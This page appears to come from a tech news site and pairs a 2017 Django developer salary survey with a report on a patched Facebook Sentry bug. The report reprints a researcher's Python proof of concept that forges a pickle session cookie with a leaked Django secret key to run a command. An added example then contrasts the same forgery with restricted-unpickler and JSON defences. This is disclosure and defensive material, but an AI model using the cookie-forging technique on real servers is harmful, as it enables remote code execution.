Django developer salary September 2017

Analysis of the US Django developer labor market, September 2017
06 September 2017

We publish a monthly analysis of the developer labor market in the United States. In September there were 100 Django developer vacancies. Their salary estimates were distributed as follows.

Figure: Django developer salary estimate, September 2017

Most of the vacancies are in New York, NY; the fewest in Chicago, IL.

Figure: Number of Django developer vacancies by city, September 2017

The companies with the most Django developer vacancies are:

  • Smith & Keller
  • Jobspring Partners 
  • Elevano

Figure: Number of Django developer vacancies by company, September 2017

By required experience level, the vacancies are distributed as follows.

Figure: Django developer vacancies by experience level, September 2017

The average salary, overall and by experience level, is shown below.

Figure: Django developer average salary, September 2017

The analysis was carried out using the Hype.codes portal's method on indeed.com data.

Another Facebook Vulnerability Found

Cybersecurity specialist from SCRT finds a way to execute code remotely on a Facebook server
27 August 2018

Daniel Le Gall from SCRT reported a vulnerability he found on one of Facebook's servers. The problem was in Sentry, a log-storage web application written in Python on the Django framework. Facebook's engineers have already patched the hole.

Daniel found the problem while scanning the IP address ranges belonging to the social network. On one of them a Sentry service was running under the host name sentryagreements.thefacebook.com. While reviewing the application, he noticed a stack trace that appeared for no obvious reason, and problems with the user password reset function. According to him, Django's debug mode had not been disabled, so the trace exposed the application's entire environment:

Figure: Facebook Vulnerability

Among the environment keys the SCRT expert spotted SESSION_SERIALIZER, which was set to django.contrib.sessions.serializers.PickleSerializer. Daniel explained that with a forged session containing arbitrary data in Python's binary Pickle serialization format, arbitrary code can be run on the system. To forge a session he needed Django's secret key, which appeared in plaintext in the list of Sentry settings under the name system.secret-key:

Figure: Facebook Vulnerability

The researcher wrote a proof-of-concept script that replaced the existing contents of the sentrysid cookie with an arbitrary object, which made the page take 30 seconds longer to load:

#!/usr/bin/python
import django.core.signing, django.contrib.sessions.serializers
from django.http import HttpResponse
import cPickle
import os

SECRET_KEY='[RETRIEVEDKEY]'
#Initial cookie I had on sentry when trying to reset a password
cookie='gAJ9cQFYCgAAAHRlc3Rjb29raWVxAlgGAAAAd29ya2VkcQNzLg:1fjsBy:FdZ8oz3sQBnx2TPyncNt0LoyiAw'
newContent =  django.core.signing.loads(cookie,key=SECRET_KEY,serializer=django.contrib.sessions.serializers.PickleSerializer,salt='django.contrib.sessions.backends.signed_cookies')
class PickleRce(object):
    def __reduce__(self):
        return (os.system,("sleep 30",))
newContent['testcookie'] = PickleRce()

print django.core.signing.dumps(newContent,key=SECRET_KEY,serializer=django.contrib.sessions.serializers.PickleSerializer,salt='django.contrib.sessions.backends.signed_cookies',compress=True)

He sent the vulnerability report to the Facebook team and received $5000 under the bug bounty program. The company's engineers fixed the issue 10 days after receiving the notification.
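As an added example (not the researcher's script and not Django's own code), the stdlib-only stand-in below for a signed-cookie session shows why the serializer choice mattered once the secret key had leaked: the signature still verifies for anyone holding the key, so a pickle payload is accepted and its embedded global is called on load, whereas a restricted unpickler or the JSON serializer refuses it. The mini signing scheme, the class and function names, and the use of os.getpid as a harmless stand-in are all assumptions made for this example.

```python
import base64, hashlib, hmac, io, json, os, pickle
# Constructed stand-in for Django's signed-cookie session backend (not Django's own code,
# which also salts, compresses and timestamps): serialize the dict, base64 it, HMAC-sign it.
def sign(payload: bytes, key: str) -> str:
    sig = hmac.new(key.encode(), payload, hashlib.sha256).hexdigest()
    return base64.urlsafe_b64encode(payload).decode() + ":" + sig

def unsign(cookie: str, key: str) -> bytes:
    b64, _, sig = cookie.rpartition(":")
    payload = base64.urlsafe_b64decode(b64.encode())
    expected = hmac.new(key.encode(), payload, hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, sig):
        raise ValueError("bad signature")
    return payload

class PickleSerializer:  # what SESSION_SERIALIZER pointed to on the Sentry host
    dumps, loads = staticmethod(pickle.dumps), staticmethod(pickle.loads)

class JSONSerializer:  # Django's default serializer; it cannot encode callables at all
    dumps = staticmethod(lambda obj: json.dumps(obj).encode())
    loads = staticmethod(lambda data: json.loads(data.decode()))

class RestrictedUnpickler(pickle.Unpickler):
    """Defensive unpickler: refuses every global except a few plain data types."""
    SAFE = {("builtins", n) for n in ("dict", "list", "set", "tuple", "str", "int", "float")}
    def find_class(self, module, name):
        if (module, name) in self.SAFE:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"refusing to load {module}.{name}")

class RestrictedPickleSerializer(PickleSerializer):
    loads = staticmethod(lambda data: RestrictedUnpickler(io.BytesIO(data)).load())

class Callback:
    """Unpickling this calls a global; os.getpid is a harmless stand-in for os.system."""
    def __reduce__(self):
        return (os.getpid, ())

def forge_cookie(key: str, serializer=PickleSerializer) -> str:
    """What anyone holding the leaked secret key can mint: a validly signed session."""
    return sign(serializer.dumps({"testcookie": Callback()}), key)

def session_accepted(cookie: str, key: str, serializer) -> bool:
    """True if the server would accept the cookie and materialise its session object."""
    try:
        serializer.loads(unsign(cookie, key))
    except (ValueError, pickle.UnpicklingError):  # bad signature, bad JSON or refused global
        return False
    return True
```

Without the key the forged cookie fails signature verification, so the debug page leaking system.secret-key is what turned a serializer misconfiguration into remote code execution; switching to the JSON serializer (or never unpickling untrusted input) removes the second half of that chain.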